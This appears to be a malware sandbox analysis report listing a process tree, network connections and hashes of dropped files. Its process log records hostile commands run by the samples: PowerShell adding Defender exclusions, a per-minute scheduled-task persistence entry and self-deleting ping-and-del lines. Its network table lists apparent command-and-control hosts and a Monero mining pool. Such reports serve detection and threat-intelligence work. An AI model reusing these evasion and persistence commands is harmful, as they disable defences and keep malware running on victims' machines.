C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XW.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XW.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4532 -ip 4532
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 1236
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\MicrosoftProfile.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftProfile.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\SysWOW64\ruts\rutserv.exe -run_agent -second
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5340 -ip 5340
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 564 -p 6548 -ip 6548
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6548 -s 388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 1308
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5292 -ip 5292
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 1296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6212 -ip 6212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6212 -s 76
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 616 -p 7936 -ip 7936
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7936 -s 668
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | gateway.discord.gg | udp |
| US | 162.159.134.234:443 | gateway.discord.gg | tcp |
| US | 8.8.8.8:53 | 209.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| FR | 194.59.30.220:1336 | tcp | |
| US | 8.8.8.8:53 | 220.30.59.194.in-addr.arpa | udp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| US | 8.8.8.8:53 | 10.244.41.31.in-addr.arpa | udp |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| US | 8.8.8.8:53 | 12.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| FR | 142.250.179.67:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.74.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 88.221.135.105:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.33.115.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| US | 8.8.8.8:53 | 9.244.41.31.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | grahm.xyz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 31.10.203.116.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| GB | 2.18.190.73:80 | e5.o.lencr.org | tcp |
| US | 66.45.226.53:7777 | 66.45.226.53 | tcp |
| RU | 178.215.75.170:2525 | tcp | |
| RU | 89.169.17.238:445 | tcp | |
| RU | 89.169.0.159:554 | tcp | |
| RU | 178.215.66.130:179 | tcp | |
| RU | 83.217.197.147:80 | tcp | |
| RU | 83.217.192.194:8080 | tcp | |
| RU | 83.217.197.147:143 | tcp | |
| RU | 89.169.1.216:2000 | tcp | |
| RU | 178.215.75.170:443 | tcp | |
| RU | 83.217.197.125:1723 | tcp | |
| RU | 89.169.1.97:80 | tcp | |
| RU | 178.215.65.231:23 | tcp | |
| RU | 83.217.197.147:143 | tcp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 53.226.45.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.75.215.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.197.217.83.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | infect-crackle.cyou | udp |
| US | 104.21.45.165:443 | infect-crackle.cyou | tcp |
| US | 8.8.8.8:53 | 165.45.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | 194.192.217.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.206.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 254.238.217.23.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | fightlsoser.click | udp |
| US | 172.67.213.48:443 | fightlsoser.click | tcp |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| US | 8.8.8.8:53 | aukuqiksseyscgie.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | 48.213.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.191.200.185.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | peerhost59mj7i6macla65r.com | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 8.8.8.8:53 | 218.172.154.94.in-addr.arpa | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| N/A | 127.0.0.1:8080 | tcp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:8080 | tcp | |
| US | 8.8.8.8:53 | drive-connect.cyou | udp |
| US | 104.21.79.7:443 | drive-connect.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | 7.79.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sanboxland.pro | udp |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.131.35.89.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| N/A | 127.0.0.1:8080 | tcp | |
| US | 8.8.8.8:53 | a1060630.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1060630.xsph.ru | tcp |
| US | 8.8.8.8:53 | 138.192.8.141.in-addr.arpa | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| N/A | 127.0.0.1:8080 | tcp | |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | f0706909.xsph.ru | udp |
| RU | 141.8.193.236:80 | f0706909.xsph.ru | tcp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| DE | 195.201.57.90:80 | ipwho.is | tcp |
| US | 8.8.8.8:53 | 236.193.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.57.201.195.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| PL | 51.68.137.186:10343 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | 186.137.68.51.in-addr.arpa | udp |
| N/A | 127.0.0.1:8080 | tcp | |
| US | 172.241.23.114:443 | tcp | |
| US | 8.8.8.8:53 | 114.23.241.172.in-addr.arpa | udp |
| N/A | 127.0.0.1:64188 | tcp | |
| N/A | 127.0.0.1:64330 | tcp | |
| DE | 5.45.104.89:9676 | tcp | |
| DE | 46.4.96.24:9993 | tcp | |
| US | 8.8.8.8:53 | 24.96.4.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.104.45.5.in-addr.arpa | udp |
| N/A | 127.0.0.1:8080 | tcp | |
| US | 8.8.8.8:53 | a1059592.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1059592.xsph.ru | tcp |
| US | 8.8.8.8:53 | f1043947.xsph.ru | udp |
| RU | 141.8.192.151:80 | f1043947.xsph.ru | tcp |
| US | 8.8.8.8:53 | 151.192.8.141.in-addr.arpa | udp |
| DE | 101.99.92.189:8080 | tcp | |
| US | 8.8.8.8:53 | a1051707.xsph.ru | udp |
| RU | 141.8.192.217:80 | a1051707.xsph.ru | tcp |
| US | 8.8.8.8:53 | 189.92.99.101.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | freegeoip.app | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 104.21.73.97:443 | freegeoip.app | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | ipbase.com | udp |
| US | 104.21.85.189:443 | ipbase.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| FR | 142.250.75.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 97.73.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.85.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| DE | 195.201.57.90:80 | ipwho.is | tcp |
| US | 154.216.17.90:80 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | id71.internetid.ru | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| RU | 95.213.205.83:5655 | id71.internetid.ru | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.205.213.95.in-addr.arpa | udp |
| RU | 77.223.124.212:5655 | tcp | |
| US | 8.8.8.8:53 | 212.124.223.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ship-amongst.gl.at.ply.gg | udp |
| US | 147.185.221.24:14429 | ship-amongst.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 24.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | login-donor.gl.at.ply.gg | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:58963 | tcp | |
| US | 147.185.221.24:14429 | ship-amongst.gl.at.ply.gg | tcp |
| US | 154.216.17.90:80 | tcp | |
| N/A | 127.0.0.1:58963 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| PL | 51.68.137.186:10343 | xmr-eu2.nanopool.org | tcp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| N/A | 127.0.0.1:58963 | tcp |
Files
memory/1652-0-0x00007FFDC0733000-0x00007FFDC0735000-memory.dmp
memory/1652-1-0x00000000007C0000-0x00000000007C8000-memory.dmp
memory/1652-2-0x00007FFDC0730000-0x00007FFDC11F1000-memory.dmp
memory/1652-3-0x00007FFDC0733000-0x00007FFDC0735000-memory.dmp
memory/1652-4-0x00007FFDC0730000-0x00007FFDC11F1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\random.exe
| MD5 | 3a425626cbd40345f5b8dddd6b2b9efa |
| SHA1 | 7b50e108e293e54c15dce816552356f424eea97a |
| SHA256 | ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1 |
| SHA512 | a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668 |
C:\Users\Admin\AppData\Local\Temp\a\u1w30Wt.exe
| MD5 | e3eb0a1df437f3f97a64aca5952c8ea0 |
| SHA1 | 7dd71afcfb14e105e80b0c0d7fce370a28a41f0a |
| SHA256 | 38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521 |
| SHA512 | 43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf |
C:\Users\Admin\AppData\Local\Temp\a\client.exe
| MD5 | 52a3c7712a84a0f17e9602828bf2e86d |
| SHA1 | 15fca5f393bc320b6c4d22580fe7d2f3a1970ac2 |
| SHA256 | afa87c0232de627e818d62578bde4809d8d91a3021bc4b5bdb678767844e2288 |
| SHA512 | 892e084cfe823d820b00381625edda702a561be82c24a3e2701a1b2a397d4fc49e45ca80ac93a60d46efc83b224a6dc7ea1ea85f74ee8a27220a666b3f7ebfac |
memory/2080-37-0x00000213C4AF0000-0x00000213C4CB2000-memory.dmp
memory/2080-38-0x00007FFDC0730000-0x00007FFDC11F1000-memory.dmp
memory/2080-36-0x00000213AA4D0000-0x00000213AA4E8000-memory.dmp
memory/2080-39-0x00000213C52F0000-0x00000213C5818000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\main\main.bat
| MD5 | 3626532127e3066df98e34c3d56a1869 |
| SHA1 | 5fa7102f02615afde4efd4ed091744e842c63f78 |
| SHA256 | 2a0e18ef585db0802269b8c1ddccb95ce4c0bac747e207ee6131dee989788bca |
| SHA512 | dcce66d6e24d5a4a352874144871cd73c327e04c1b50764399457d8d70a9515f5bc0a650232763bf34d4830bab70ee4539646e7625cfe5336a870e311043b2bd |
C:\Users\Admin\AppData\Local\Temp\main\file.bin
| MD5 | 045b0a3d5be6f10ddf19ae6d92dfdd70 |
| SHA1 | 0387715b6681d7097d372cd0005b664f76c933c7 |
| SHA256 | 94b392e94fa47d1b9b7ae6a29527727268cc2e3484e818c23608f8835bc1104d |
| SHA512 | 58255a755531791b888ffd9b663cc678c63d5caa932260e9546b1b10a8d54208334725c14529116b067bcf5a5e02da85e015a3bed80092b7698a43dab0168c7b |
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
| MD5 | 619f7135621b50fd1900ff24aade1524 |
| SHA1 | 6c7ea8bbd435163ae3945cbef30ef6b9872a4591 |
| SHA256 | 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2 |
| SHA512 | 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628 |
C:\Users\Admin\AppData\Local\Temp\main\7z.dll
| MD5 | 72491c7b87a7c2dd350b727444f13bb4 |
| SHA1 | 1e9338d56db7ded386878eab7bb44b8934ab1bc7 |
| SHA256 | 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891 |
| SHA512 | 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip
| MD5 | cea368fc334a9aec1ecff4b15612e5b0 |
| SHA1 | 493d23f72731bb570d904014ffdacbba2334ce26 |
| SHA256 | 07e38cad68b0cdbea62f55f9bc6ee80545c2e1a39983baa222e8af788f028541 |
| SHA512 | bed35a1cc56f32e0109ea5a02578489682a990b5cefa58d7cf778815254af9849e731031e824adba07c86c8425df58a1967ac84ce004c62e316a2e51a75c8748 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip
| MD5 | 0dc4014facf82aa027904c1be1d403c1 |
| SHA1 | 5e6d6c020bfc2e6f24f3d237946b0103fe9b1831 |
| SHA256 | a29ddd29958c64e0af1a848409e97401307277bb6f11777b1cfb0404a6226de7 |
| SHA512 | cbeead189918657cc81e844ed9673ee8f743aed29ad9948e90afdfbecacc9c764fbdbfb92e8c8ceb5ae47cee52e833e386a304db0572c7130d1a54fd9c2cc028 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip
| MD5 | b7d1e04629bec112923446fda5391731 |
| SHA1 | 814055286f963ddaa5bf3019821cb8a565b56cb8 |
| SHA256 | 4da77d4ee30ad0cd56cd620f4e9dc4016244ace015c5b4b43f8f37dd8e3a8789 |
| SHA512 | 79fc3606b0fe6a1e31a2ecacc96623caf236bf2be692dadab6ea8ffa4af4231d782094a63b76631068364ac9b6a872b02f1e080636eba40ed019c2949a8e28db |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip
| MD5 | 7187cc2643affab4ca29d92251c96dee |
| SHA1 | ab0a4de90a14551834e12bb2c8c6b9ee517acaf4 |
| SHA256 | c7e92a1af295307fb92ad534e05fba879a7cf6716f93aefca0ebfcb8cee7a830 |
| SHA512 | 27985d317a5c844871ffb2527d04aa50ef7442b2f00d69d5ab6bbb85cd7be1d7057ffd3151d0896f05603677c2f7361ed021eac921e012d74da049ef6949e3a3 |
